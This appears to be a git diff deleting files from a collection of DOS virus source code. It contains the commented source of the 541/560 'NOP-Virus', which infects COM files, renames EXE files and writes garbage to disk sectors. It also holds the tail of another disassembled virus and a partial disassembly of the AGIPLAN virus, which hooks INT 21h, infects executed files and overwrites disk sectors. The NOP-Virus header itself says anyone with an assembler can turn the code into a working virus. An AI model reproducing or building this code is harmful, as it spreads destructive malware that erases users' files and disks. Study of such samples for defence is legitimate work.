. . . . ;001FD E81100 ___ - MOV ES:[DI+04h],SI ;ES_Ovrd ;00200 26897504 &_u_ - LAHF ;00204 9F _ - SUB ES:[DI],BP ;ES_Ovrd ;00205 26292D &)- - SAHF ;00208 9E _ -H00209: POP AX ;00209 58 X -H0020A: POP BP ;0020A 5D ] - POP DI ;0020B 5F _ - POP SI ;0020C 5E ^ - POP ES ;0020D 07 _ - RET 0002h ;RET_Far:0002h ;0020E CA0200 ___ -;--------------------------------------------------- -H00211: MOV AH,3Fh ;00211 B43F _? - PUSHF ;00213 9C _ - PUSH CS ;00214 0E _ - CALL H0023A ; . . . . . . . . . ;00215 E82200 _"_ - RET ;RET_Near ;00218 C3 _ -;--------------------------------------------------- - CMP AH,3Fh ;00219 80FC3F __? 
- JZ H001CE ;0021C 74B0 t_ - PUSH DS ;0021E 1E _ - PUSH ES ;0021F 06 _ - PUSH AX ;00220 50 P - PUSH BX ;00221 53 S - PUSH CX ;00222 51 Q - PUSH DX ;00223 52 R - PUSH SI ;00224 56 V - PUSH DI ;00225 57 W - CMP AH,3Eh ;00226 80FC3E __> - JZ H0023F ;00229 7414 t_ - CMP AX,4B00h ;0022B 3D004B =_K - MOV AH,3Dh ;0022E B43D _= - JZ H00241 ;00230 740F t_ - POP DI ;00232 5F _ - POP SI ;00233 5E ^ - POP DX ;00234 5A Z - POP CX ;00235 59 Y - POP BX ;00236 5B [ - POP AX ;00237 58 X - POP ES ;00238 07 _ - POP DS ;00239 1F _ -H0023A: JMP Word Ptr CS:[0004h] - ;Mem_Brch:CS:[0004h];0023A 2EFF2E0400 ._.__ -;--------------------------------------------------- -H0023F: MOV AH,45h ;0023F B445 _E -H00241: CALL H001B0 ; . . . . . . . . . ;00241 E86CFF _l_ - JB H00232 ;00244 72EC r_ - SUB AX,AX ;00246 2BC0 +_ - MOV [DI+04h],AX ;00248 894504 _E_ - MOV Byte Ptr [DI-0Fh],02h ;0024B C645F102 _E__ - CLD ;0024F FC _ - MOV DS,AX ;DS_Chg ;00250 8ED8 __ - MOV SI,004Ch ;00252 BE4C00 _L_ - LODSW ;00255 AD _ - PUSH AX ;00256 50 P - LODSW ;00257 AD _ - PUSH AX ;00258 50 P - PUSH [SI+40h] ;00259 FF7440 _t@ - PUSH [SI+42h] ;0025C FF7442 _tB - LDS DX,CS:[SI-50h] ;CS_Ovrd ;0025F 2EC554B0 ._T_ - MOV AX,2513h ;00263 B81325 __% - INT 21h ;1-Set_Int_Vctr ;00266 CD21 _! - PUSH CS ;00268 0E _ - POP DS ;00269 1F _ - MOV DX,0204h ;0026A BA0402 ___ - MOV AL,24h ;0026D B024 _$ - INT 21h ;Indef_INT:21h-25h ;0026F CD21 _! - PUSH ES ;00271 06 _ - POP DS ;00272 1F _ - MOV AL,[DI-04h] ;00273 8A45FC _E_ - AND AL,1Fh ;00276 241F $_ - CMP AL,1Fh ;00278 3C1F <_ - JZ H00284 ;0027A 7408 t_ - MOV AX,[DI+17h] ;0027C 8B4517 _E_ - SUB AX,4F43h ;0027F 2D434F -CO - JNZ H002C3 ;00282 753F u? 
-H00284: XOR [DI-04h],AL ;00284 3045FC 0E_ - MOV AX,[DI] ;00287 8B05 __ - CMP AX,CX ;00289 3BC1 ;_ -;--------------------------------------------------- - DB "r6" ;0028B 7236 -;--------------------------------------------------- - ADD AX,CX ;0028D 03C1 __ - JB H002C3 ;0028F 7232 r2 - TEST Byte Ptr [DI-0Dh],04h ;00291 F645F304 _E__ - JNZ H002C3 ;00295 752C u, - LDS SI,[DI-0Ah] ;00297 C575F6 _u_ - DEC AX ;0029A 48 H - SHR AH,1 ;0029B D0EC __ - AND AH,[SI+04h] ;0029D 226404 "d_ - JZ H002C3 ;002A0 7421 t! - MOV AX,0020h ;002A2 B82000 _ _ - MOV DS,AX ;DS_Chg ;002A5 8ED8 __ - SUB DX,DX ;002A7 2BD2 +_ - CALL H00211 ; . . . . . . . . . ;002A9 E865FF _e_ - MOV SI,DX ;002AC 8BF2 __ - PUSH CX ;002AE 51 Q - LODSB ;002AF AC _ - CMP AL,CS:[SI+07h] ;CS_Ovrd ;002B0 2E3A4407 .:D_ - JNZ H002DD ;002B4 7527 u' - LOOP H002AF ;002B6 E2F7 __ - POP CX ;002B8 59 Y - OR Byte Ptr ES:[DI-04h],1Fh - ;ES_Ovrd ;002B9 26804DFC1F &_M__ - OR Byte Ptr ES:[DI-0Bh],40h - ;ES_Ovrd ;002BE 26804DF540 &_M_@ -H002C3: MOV AH,3Eh ;002C3 B43E _> - CALL H00213 ; . . . . . . . . . ;002C5 E84BFF _K_ - OR Byte Ptr ES:[DI-0Ch],40h - ;ES_Ovrd ;002C8 26804DF440 &_M_@ - POP DS ;002CD 1F _ - POP DX ;002CE 5A Z - MOV AX,2524h ;002CF B82425 _$% - INT 21h ;1-Set_Int_Vctr ;002D2 CD21 _! - POP DS ;002D4 1F _ - POP DX ;002D5 5A Z - MOV AL,13h ;002D6 B013 __ - INT 21h ;Indef_INT:21h-25h ;002D8 CD21 _! - JMP H00232 ;002DA E955FF _U_ -;--------------------------------------------------- -H002DD: POP CX ;002DD 59 Y - MOV SI,ES:[DI] ;ES_Ovrd ;002DE 268B35 &_5 - MOV ES:[DI+04h],SI ;ES_Ovrd ;002E1 26897504 &_u_ - MOV AH,40h ;002E5 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;002E7 CD21 _! - JB H002BE ;002E9 72D3 r_ - MOV ES:[DI],SI ;ES_Ovrd ;002EB 268935 &_5 - MOV ES:[DI+04h],DX ;ES_Ovrd ;002EE 26895504 &_U_ - PUSH CS ;002F2 0E _ - POP DS ;002F3 1F _ - MOV DL,08h ;002F4 B208 __ - MOV AH,40h ;002F6 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;002F8 CD21 _! 
- JMP Short H002B9 ;002FA EBBD __ -;--------------------------------------------------- - IRET ;002FC CF _ -;--------------------------------------------------- - DB "666" ;002FD 363636 -;--------------------------------------------------- - - -P00100 ENDP - -CODE ENDS - END H00100 - -;------------------------------------------------------------------------------- - -INT 2F - Multiplex - DOS 3.3+ - SET DISK INTERRUPT HANDLER - AH = 13h - DS:DX -> interrupt handler disk driver calls on read/write - ES:BX = address to restore INT 13 to on system halt (exit from root - shell) -Return: DS:DX from previous invocation of this function - ES:BX from previous invocation of this function -Notes: most DOS 3.3+ disk access is via the vector in DS:DX, although a few - functions are still invoked via an INT 13 instruction - this is a dangerous security loophole for any virus-monitoring software - which does not trap this call (at least two viruses are known to use - it to get the original ROM entry point) diff --git a/0-9/560 (12).ASM b/0-9/560 (12).ASM deleted file mode 100755 index 988d520..0000000 --- a/0-9/560 (12).ASM +++ /dev/null 
@@ -1,464 +0,0 @@ -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; - -PAGE 70,120 - -;; -;; -;; Name Virus: 541-Virus 14 Sept 1990 -;; Suggested Alias: NOP-Virus -;; Variant: 537-Virus, 560-Virus -;; -;; Last Reported: September 1990 -;; 'Isolated': The Hague, The Netherlands -;; by: Righard Zwienenberg 2:512/2.3@fidonet -;; -;; Author: Ralf Burger in 1986 for his book: -;; VIRUSES, A HIGH TECHNICAL DISEASE -;; -;; -;; The code of this virus was built into a MOVE-util. It was imple- -;; mented wrong. The virus went straight to the destruction code. -;; I've taken the code out and reconstructed it to its original -;; form. Because I had a listing of Ralf Burger's book I have placed -;; his own comments behind the code, although I've translated it into -;; English. The labels used, are also his. -;; -;; I've put three comments myself in the code. These can be recog- -;; nized by the starting ;; of it. -;; -;; Edwin Cleton, the one who send me the MOVE util for examination -;; downloaded it from a BBS. So far there are no damage reports. 
-;; The move-util checked the system's date. If the date is 1 Aug -;; or later of any year, the virus was called. -;; -;; -;; -;; This sourcelisting can be recompiled with MASM 4.0+ and A86. For -;; compilation with A86 you must specify 'conta' and 'disks' as a word -;; else the definition will conflict with what A86 previously thinks. -;; -;; -;; -;; Virus-Description: -;; ------------------ -;; -;; The virus infects the first COM-file in the ROOT-Directory. The -;; virus overwrites the first 230h bytes of the file. When an infected -;; file is executed it will infect one other .COM-file. The system will -;; crash mostly afterwards because the overwritten part is not stored. -;; When COMMAND.COM is infected on the HDU, the system will not reboot -;; because COMMAND.COM is complete. Each reboot COMMAND.COM will infect -;; one other .COM-File and the computer crashes. When all .COM-files -;; are infected, .EXE-files will be renamed (FCB) to .COM to become -;; infected. When all .COM and .EXE-files are infected, the virus will -;; write to sectors on disk depending on the system's time. -;; The infected files are lost en must be replaced by backup-copies. -;; -;; The shortest size an infected file can be is 230h bytes. The code is -;; shorter, but this is the value which has been put into the code as -;; the virus-length. -;; -;; - - -Code Segment - Assume CS:Code -progr equ 100h - org progr - -; -; The three NOP's are set as a identifier for the virus. This way -; the virus knows this copy is already infected. -; - -MAIN: - nop - nop - nop - -; -; Init the Pointers -; - - mov ax,0 - mov es:[pointer],ax - mov es:[counter],ax - mov es:[disks],al - -; -; Get actual diskdrive -; - - mov ah,19h ; drive? - int 21h - -; -; Get actual path -; - - mov cs:drive,al ; save drive - mov ah,47h ; dir? - mov dh,0 - add al,1 - mov dl,al ; in actual drive? 
- lea si,cs:old_path - int 21h - -; -; Get actual number of present diskdrives.If only one diskdrive is present, -; the pointer for 'search_order' will transfered to 'search_order + 6' -; - - mov ah,0Eh ; how many disks - mov dl,0 - int 21h - mov al,1 - cmp al,1 ; one drive? - jne hups3 - mov al,6 -hups3: - mov ah,0 - lea bx,cs:search_order - add bx,ax - add bx,1 - mov cs:pointer,bx - clc - -; -; The carry-flag is set if the search will find no more .COM-files. To do -; it the easy way, all .EXE-files will get the .COM-extention to become -; infected. This will result in an error if the executed .EXE is to big. -; The error-message 'Program too big to fit in memory' will be the result. -; - -change_disk: - jnc no_name_change - mov ah,17h ; change exe to com - lea dx,cs:mask_exe - int 21h - cmp al,0FFh - jnz no_name_change ; .EXE found? - -; -; When no .COM or .EXE-files are found, sectors will be overwritten, -; depending from the system's time in the msec-range. This is the moment -; that the entire disk is infected. 'VIRUS' can not infect any more and -; starts the destruction. -; - - mov ah,2Ch ; read system clock - int 21h - mov bx,cs:pointer - mov al,cs:[bx] - mov bx,dx - mov cx,2 - mov dh,0 - int 26h ; Write shit on disk - -; -; Test if the end of the seek-procedure or of the table has been reached. -; If so: end. -; - -no_name_change: - mov bx,cs:pointer - dec bx - mov cs:pointer,bx - mov dl,cs:[bx] - cmp dl,0FFh - jnz hups2 - jmp hops - -; -; Get new disk from the list with search orders and make it the actual one. -; - -hups2: - mov ah,0Eh - int 21h ; change disk - -; -; Start at the ROOT-Directory. -; - - mov ah,3Bh ; change path - lea dx,cs:path - int 21h - jmp find_first_file - -; -; Starting from the ROOT-dir, search for the first sub-dir. Previous change -; all .EXE-files into .COM-files in the old directory. 
-; - -find_first_subdir: - mov ah,17h ; change exe to com - lea dx,cs:mask_exe - int 21h - mov ah,3Bh ; use root dir - lea dx,cs:path - int 21h - mov ah,4Eh ; search for first subdir - mov cx,11h ; dir mask - lea dx,cs:mask_dir - int 21h - jc change_disk - mov bx,cs:counter - inc bx - dec bx - jz use_next_subdir - -; -; Search for the next sub-dirs. Change to other drive if no sub-dir is -; found. -; - -find_next_subdir: - mov ah,4Fh ; search for next sub-dir. - int 21h - jc change_disk - dec bx - jnz find_next_subdir - -; -; Change found sub-dir in actual one. -; - -use_next_subdir: - mov ah,2Fh ; get dta address - int 21h - add bx,1Ch - mov word ptr es:[bx],'\' ; address of name in dta - inc bx - push ds - mov ax,es - mov ds,ax - mov dx,bx - mov ah,3Bh ; change path - int 21h - pop ds - mov bx,cs:counter - inc bx - mov cs:counter,bx - -; -; Search first .COM-file in the actual directory. If no .COM-files present, -; search the next directory. -; - -find_first_file: - mov ah,4Eh ; search for first - mov cx,1 ; mask - lea dx,cs:mask_com - int 21h - jc find_first_subdir - jmp short check_if_ill - -; -; If the file is already infected, search next file. -; - -find_next_file: - mov ah,4Fh ; search for next - int 21h - jc find_first_subdir - -; -; Test on infection. -; - -check_if_ill: - mov ah,3Dh ; open channel - mov al,2 ; read/write - mov dx,9Eh ; address of name in dta - int 21h - mov bx,ax ; save channel - mov ah,3Fh ; read file - mov cx,buflen - mov dx,buffer ; write in buffer - int 21h - mov ah,3Eh ; close file - int 21h - -; -; Test if the three NOPs of 'VIRUS' are present. If so, the file is already -; infected, continue searching. -; - - mov bx,cs:[buffer] - cmp bx,9090h - jz find_next_file - -; -; Erase the write-protection attribute from MS-DOS. -; - - mov ah,43h ; write enable - mov al,0 - mov dx,9Eh ; address of name in dta - int 21h - mov ah,43h - mov al,1 - and cx,0FEh - int 21h - -; -; Open file for writing/reading. 
-; - - mov ah,3Dh ; open channel - mov al,2 ; read/write - mov dx,9Eh ; address of name in dta - int 21h - -; -; Store date of file for later use. -; - - mov bx,ax ; channel - mov ah,57h ; get date - mov al,0 - int 21h - push cx ; save data - push dx - -; -; Save the original jump from program. -; - - mov dx,cs:[conta] ; save old jmp - mov cs:[jmpbuf],dx - mov dx,cs:[buffer+1] ; save new jump - lea cx,cs:cont-100h - sub dx,cx - mov cs:[conta],dx - -; -; 'VIRUS' copies itself to the beginning of a file. -; - - mov ah,40h ; write virus - mov cx,buflen ; length buffer - lea dx,main ; write virus - int 21h - -; -; Restore the old file-date. -; - - mov ah,57h ; write date - mov al,1 - pop dx - pop cx ; restore date - int 21h - -; -; Close file. -; - - mov ah,3Eh ; close file - int 21h - -; -; Restore the old jump-address. 'VIRUS' stores at address 'conta' the jump -; which was at the beginning of the host-program. This will keep the host- -; program as much executable as possible. After storing the address, it -; works with the jumpaddress of 'VIRUS'. 'VIRUS' will thus be in the -; work-memory of the program. -; - - mov dx,cs:[jmpbuf] ; restore old jmp - mov cs:[conta],dx -hops: - nop - call use_old - -; -; Continue the execution of the host-program. -; - - -cont db 0e9h -conta dw 0 - mov ah,00 - int 21h - -; -; Activate the diskdrive choosen at the entry of the program. -; - -use_old: - mov ah,0eh ; use old drive - mov dl,cs:drive - int 21h - -; -; Activate the path choosen at the entry of the program. 
-; - - mov ah,3Bh ; use old dir - lea dx,cs:[1FDh] ; get old path and - ; backslash - int 21h - ret - - -search_order db 0FFh,1,0,2,3,0FFh,0,0FFh -pointer dw 0000 -counter dw 0000 -disks db 0 -mask_com db "*.com",00 ; search for com-files -mask_dir db "*",00 ; search for dirs -mask_exe db 0FFh, 0, 0, 0, 0, 0, 3Fh - db 0,"????????exe",0,0,0,0 - db 0,"????????com",0 -mask_all db 0FFh, 0, 0, 0, 0, 0, 3Fh - db 0,"???????????",0,0,0,0 - db 0,"????????com",0 - -;; mask_all is never used by the code and easilly can be ommited -;; to shorten the code - -buffer equ 0e000h ; a save place -buflen equ 230h ; length of virus - -;; At this place I disagree with Ralf. The actual length of the virus -;; is 21Dh bytes when compiled in MASM and 219h bytes when compiled -;; in A86. Because it was Ralf's intention to compile this in MASM -;; 21Dh should be the original length. - -jmpbuf equ buffer+buflen ; a save place for jmp -path db "\",0 ; first path -drive db 0 ; actual drive -back_slash db "\" - -;; This variable is never used in the code and easilly can be ommited -;; to shorten the code. - -old_path db 32 dup (?) ; old path - -code ends - - end main diff --git a/a/AGIPLAN (15).ASM b/a/AGIPLAN (15).ASM deleted file mode 100755 index d1f62b0..0000000 --- a/a/AGIPLAN (15).ASM +++ /dev/null 
@@ -1,1003 +0,0 @@
-
-PAGE 59,132
-
-;
-;
-; AGIPLAN
-;
-; Created: 1-Sep-90
-; Version:
-; Passes: 5 Analysis Options on: none
-;
-;
-;
-
-movseg macro reg16, unused, Imm16 ; Fixup for Assembler
- ifidn ,
- db 0BBh
- endif
- ifidn ,
- db 0B9h
- endif
- ifidn ,
- db 0BAh
- endif
- ifidn ,
- db 0BEh
- endif
- ifidn ,
- db 0BFh
- endif
- ifidn ,
- db 0BDh
- endif
- ifidn ,
- db 0BCh
- endif
- ifidn ,
- db 0BBH
- endif
- ifidn ,
- db 0B9H
- endif
- ifidn ,
- db 0BAH
- endif
- ifidn ,
- db 0BEH
- endif
- ifidn ,
- db 0BFH
- endif
- ifidn ,
- db 0BDH
- endif
- ifidn ,
- db 0BCH
- endif
- dw seg Imm16
-endm
-data_1e equ 46Dh ; (0000:046D=0B35h)
-data_2e equ 600h ; (0000:0600=54h)
-data_3e equ 0Eh ; (0A10:000E=1)
-data_4e equ 1 ; (936D:0001=0FFFFh)
-data_5e equ 0 ; (936E:0000=0)
-data_6e equ 2 ; (936E:0002=0)
-data_7e equ 12h ; (936E:0012=0)
-data_8e equ 14h ; (936E:0014=936Eh)
-data_9e equ 0F0h ; (936E:00F0=0)
-data_10e equ 0F6h ; (936E:00F6=0)
-data_11e equ 0FAh ; (936E:00FA=0)
-data_12e equ 0FEh ; (936E:00FE=0)
-data_45e equ 2Ch ; (93CE:002C=0FFFFh)
-data_46e equ 5B0h ; (93CE:05B0=41h)
-data_47e equ 600h ; (93CE:0600=41h)
-data_48e equ 1 ; (FFFE:0001=0)
-
-seg_a segment byte public
- assume cs:seg_a, ds:seg_a
-
-
- org 100h
-
-agiplan proc far
-
-start:
- jmp loc_43 ; (04CF)
-data_14 db 'P1.8&', 5, 'u', 7, 'X.', 0FFh
- db '.', 5, '', 0FFh, 0
- db 75h,0F4h, 58h
-data_15 db 9Dh
- db 0B8h, 03h, 00h,0CFh, 90h, 90h
- db 90h
-data_16 db 0
- db 90h, 00h,0FFh,0FFh,0FFh,0FFh
- db 0FFh
-
-agiplan endp
-
-;
-;
-; External Entry Point
-;
-;
-
-int_21h_entry proc far
- pushf ; Push flags
- cmp ah,4Eh ; 'N'
- jne loc_4 ; Jump if not equal
- jmp short loc_8 ; (0154)
-loc_4:
- cmp ah,4Bh ; 'K'
- jne loc_5 ; Jump if not equal
- jmp short loc_8 ; (0154)
-loc_5:
- cmp ah,0Eh
- jne loc_6 ; Jump if not equal
- jmp short loc_8 ; (0154)
-loc_6:
- cmp ah,40h ; '@'
- jne loc_7 ; Jump if not equal
- jmp short loc_8 ; (0154)
-loc_7:
- popf ; Pop flags
- jmp dword ptr cs:data_35 ;
(936E:05E4=138Dh) - db 90h -loc_8: - cli ; Disable interrupts - push es - push ds - push di - push si - push bp - push dx - push cx - push bx - push ax - mov cs:data_31,ss ; (936E:05DB=0A10h) - mov cs:data_32,sp ; (936E:05DD=743h) - mov al,0FFh - mov cs:data_30,al ; (936E:05DA=0FFh) - mov ax,3524h - int 7Eh ; ??INT Non-standard interrupt. - cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) - jne loc_9 ; Jump if not equal - mov ax,2524h - mov dx,108h - push cs - pop ds - int 7Eh ; ??INT Non-standard interrupt. -loc_9: - sti ; Enable interrupts - jmp short loc_11 ; (01AA) -loc_10: - cli ; Disable interrupts - xor ax,ax ; Zero register - mov cs:data_30,ah ; (936E:05DA=0FFh) - mov ss,cs:data_31 ; (936E:05DB=0A10h) - mov sp,cs:data_32 ; (936E:05DD=743h) - pop ax - pop bx - pop cx - pop dx - pop bp - pop si - pop di - pop ds - pop es - popf ; Pop flags - sti ; Enable interrupts - jmp dword ptr cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_11: - pop ax - pop bx - push bx - push ax - cmp ah,4Bh ; 'K' - je loc_16 ; Jump if equal - cmp ah,40h ; '@' - jne loc_12 ; Jump if not equal - jmp short loc_15 ; (01CC) -loc_12: - cmp ah,0Eh - jne loc_13 ; Jump if not equal - jmp short loc_10 ; (0187) -loc_13: - cmp ah,4Eh ; 'N' - jne loc_10 ; Jump if not equal - jmp short loc_10 ; (0187) - db 90h -loc_14: - jmp loc_23 ; (0283) -loc_15: - mov ax,0Fh - cmp cs:data_29,al ; (936E:05D9=0) - jb loc_10 ; Jump if below - ja loc_14 ; Jump if above - cmp bx,4 - jbe loc_10 ; Jump if below or = - mov bx,1 - push cs - pop ds - add ds:data_11e,bx ; (936E:00FA=0) - mov ah,2Ch ; ',' - int 7Eh ; ??INT Non-standard interrupt. - cmp dh,ds:data_11e ; (936E:00FA=0) - ja loc_10 ; Jump if above - mov bx,data_3e ; (0A10:000E=1) - add bx,data_32 ; (936E:05DD=743h) - mov ss:[bx],bx - jmp short loc_10 ; (0187) - db 01h, 90h, 90h, 90h -loc_16: - mov cs:data_33,dx ; (936E:05DF=3D7Bh) - mov cs:data_34,ds ; (936E:05E1=7B6Eh) - push cs - pop ds - mov ah,2Ch ; ',' - int 7Eh ; ??INT Non-standard interrupt. 
- cmp dh,ds:data_12e ; (936E:00FE=0) - jb loc_17 ; Jump if below - jmp loc_10 ; (0187) -loc_17: - mov dx,data_33 ; (936E:05DF=3D7Bh) - mov ds,data_34 ; (936E:05E1=7B6Eh) - push ax - mov al,2Eh ; '.' - cld ; Clear direction - push ds - push dx - cli ; Disable interrupts - mov di,dx - push ds - pop es - mov cx,20h - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - jnz loc_20 ; Jump if not zero - push cs - pop ds - mov si,offset data_21 ; (936E:05C8=43h) - mov cx,3 - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - jnz loc_22 ; Jump if not zero - sub di,0Bh - mov si,offset data_20 ; (936E:05C0=43h) - mov cx,0Bh - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - mov dh,0FFh - mov cs:data_16,dh ; (936E:0128=0) - jz loc_18 ; Jump if zero - xor dx,dx ; Zero register - mov cs:data_16,dh ; (936E:0128=0) -loc_18: - add sp,6 - push cs - pop ds -loc_19: - call sub_2 ; (02C0) -loc_20: - jmp loc_10 ; (0187) - db 90h, 90h -loc_21: -;* jmp loc_34 ;*(03E0) - db 0E9h, 76h, 01h -loc_22: - add sp,6 - push cs - pop ds - mov dx,5C0h - mov data_33,dx ; (936E:05DF=3D7Bh) - mov data_34,ds ; (936E:05E1=7B6Eh) - mov dh,0FFh - mov data_16,dh ; (936E:0128=0) - jmp short loc_19 ; (025F) - db 90h -loc_23: - mov cx,501h - mov dx,100h - call sub_1 ; (02A0) - mov dx,101h - call sub_1 ; (02A0) - mov dx,380h - call sub_1 ; (02A0) - mov dx,381h - call sub_1 ; (02A0) - int 19h ; Bootstrap loader -int_21h_entry endp - - -; -; SUBROUTINE -; - -sub_1 proc near - push dx -loc_24: - mov ax,309h - int 13h ; Disk dl=drive a ah=func 03h - ; write sectors from mem es:bx - sub dh,1 - cmp dh,0 - jge loc_24 ; Jump if > or = - pop dx - push dx - sub cx,100h - cmp cx,0 - jge loc_24 ; Jump if > or = - retn -sub_1 endp - - db 90h, 90h, 90h -loc_25: - jmp loc_31 ; (03A3) - -; -; SUBROUTINE -; - -sub_2 proc near - mov ah,48h ; 'H' - mov bx,0FFFh - int 7Eh ; ??INT Non-standard interrupt. 
- jc loc_21 ; Jump if carry Set - nop - mov ds:data_11e,ax ; (936E:00FA=0) - mov dx,data_33 ; (936E:05DF=3D7Bh) - mov ds,data_34 ; (936E:05E1=7B6Eh) - mov ah,3Ah ; ':' - mov bx,dx - add bx,1 - cmp ah,[bx] - mov ah,0 - jnz loc_27 ; Jump if not zero - mov bx,dx - mov al,50h ; 'P' - mov ah,[bx] - cmp ah,50h ; 'P' - ja loc_26 ; Jump if above - sub ah,40h ; '@' - jmp short loc_27 ; (02F5) -loc_26: - sub ah,60h ; '`' -loc_27: - mov dl,ah - mov ah,36h ; '6' - int 7Eh ; ??INT Non-standard interrupt. - cmp bx,9 - jb loc_25 ; Jump if below - mov dx,cs:data_33 ; (936E:05DF=3D7Bh) - mov ax,4300h - int 7Eh ; ??INT Non-standard interrupt. - mov cs:data_39,cx ; (936E:05EC=20h) - mov ax,4301h - xor cx,cx ; Zero register - int 7Eh ; ??INT Non-standard interrupt. - nop - mov ax,3D42h - int 7Eh ; ??INT Non-standard interrupt. - jc loc_25 ; Jump if carry Set - mov bx,ax - mov ah,3Fh ; '?' - mov cx,0FFFFh - mov dx,600h - mov ds,cs:data_11e ; (936E:00FA=0) - int 7Eh ; ??INT Non-standard interrupt. - jc loc_30 ; Jump if carry Set - add ax,600h - mov cs:data_10e,ax ; (936E:00F6=0) - cmp ax,1000h - jb loc_30 ; Jump if below - cmp ax,0D000h - ja loc_30 ; Jump if above - mov si,offset ds:[100h] ; (936E:0100=0E9h) - push cs - pop ds - xor di,di ; Zero register - mov es,cs:data_11e ; (936E:00FA=0) - mov cx,2FFh - cld ; Clear direction - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - push es - pop ds - xor di,di ; Zero register - mov si,data_2e ; (0000:0600=54h) - mov cx,10h - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - jz loc_30 ; Jump if zero - mov ah,cs:data_16 ; (936E:0128=0) - cmp ah,0FFh - jne loc_28 ; Jump if not equal - call sub_3 ; (03C8) - jmp short loc_29 ; (0377) -loc_28: - mov ax,9090h - mov ds:data_1e,ax ; (0000:046D=0B35h) -loc_29: - nop - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 7Eh ; ??INT Non-standard interrupt. - mov ax,5700h - int 7Eh ; ??INT Non-standard interrupt. 
- push cx - push dx - mov ah,40h ; '@' - mov cx,cs:data_10e ; (936E:00F6=0) - xor dx,dx ; Zero register - mov ds,cs:data_11e ; (936E:00FA=0) - int 7Eh ; ??INT Non-standard interrupt. - pop dx - pop cx - mov ax,5701h - int 7Eh ; ??INT Non-standard interrupt. -loc_30: - mov ah,3Eh ; '>' - int 7Eh ; ??INT Non-standard interrupt. -loc_31: - mov cx,cs:data_39 ; (936E:05EC=20h) - mov dx,cs:data_33 ; (936E:05DF=3D7Bh) - mov ds,cs:data_34 ; (936E:05E1=7B6Eh) - mov ax,4301h -loc_32: - int 7Eh ; ??INT Non-standard interrupt. - push cs - pop ds - mov es,cs:data_11e ; (936E:00FA=0) - mov ah,49h ; 'I' - int 7Eh ; ??INT Non-standard interrupt. - retn -sub_2 endp - - db 90h, 90h, 90h, 90h, 90h - -; -; SUBROUTINE -; - -sub_3 proc near - mov ax,0D08Eh - mov ds:data_1e,ax ; (0000:046D=0B35h) - mov di,data_2e ; (0000:0600=54h) - mov cx,3000h - mov ax,0B8C9h -loc_33: - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp ah,es:[di] - jne loc_33 ; Jump if not equal - mov dx,4200h - cmp dx,es:[di+1] - jne loc_33 ; Jump if not equal - mov dh,0BAh - cmp dh,es:[di-5] - jne loc_33 ; Jump if not equal - cmp cx,0 - jne loc_35 ; Jump if not equal - pop dx - jmp short loc_32 ; (03B5) - db 90h -loc_35: - mov dx,es:[di-4] - add dx,600h - mov es:[di-4],dx - retn -sub_3 endp - - db 11 dup (90h) - -; -; SUBROUTINE -; - -sub_4 proc near - mov ax,4A00h - mov bx,5Fh - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov bx,cs - sub bx,1 - mov ds,bx - mov ax,0FFFFh - mov ds:data_4e,ax ; (936D:0001=0FFFFh) - push cs - pop ds - mov ax,4800h - mov bx,0FFFFh - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ax,4800h - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - retn -sub_4 endp - - db 0CBh - db 26 dup (90h) - -; -; SUBROUTINE -; - -sub_5 proc near - mov cx,10h - mov si,offset data_15 ; (936E:0120=9Dh) - mov di,data_9e ; (936E:00F0=0) - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov ah,2Ah ; 
'*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dx=mon/day - cmp cx,data_25 ; (936E:05D1=7BCh) - ja loc_38 ; Jump if above - jc loc_36 ; Jump if carry Set - cmp dx,data_26 ; (936E:05D3=701h) - ja loc_38 ; Jump if above -loc_36: - cmp cx,data_27 ; (936E:05D5=7BCh) - ja loc_39 ; Jump if above - jc loc_37 ; Jump if carry Set - cmp dx,data_28 ; (936E:05D7=501h) - ja loc_39 ; Jump if above -loc_37: - mov ax,0 - jmp short loc_40 ; (0487) -loc_38: - or ax,0F0h -loc_39: - or ax,0Fh -loc_40: - mov data_29,al ; (936E:05D9=0) - push dx - push cx - xor bx,bx ; Zero register - call sub_6 ; (04A5) - pop cx - pop dx - mov bx,data_6e ; (936E:0002=0) - call sub_6 ; (04A5) - mov ah,1 - add data_22,ah ; (936E:05CC=14h) - nop - retn -sub_5 endp - - db 90h, 90h, 90h, 90h - -; -; SUBROUTINE -; - -sub_6 proc near - add dl,data_24[bx] ; (936E:05CE=0) - cmp dl,20h ; ' ' - jbe loc_41 ; Jump if below or = - add dh,1 - sub dl,20h ; ' ' -loc_41: - add dh,data_23[bx] ; (936E:05CD=6) - cmp dh,0Bh - jbe loc_42 ; Jump if below or = - sub dh,0Bh - add cx,1 -loc_42: - add bx,bx - nop - mov data_26[bx],dx ; (936E:05D3=701h) - mov data_25[bx],cx ; (936E:05D1=7BCh) - retn -sub_6 endp - -loc_43: - push ax - mov al,3Fh ; '?' 
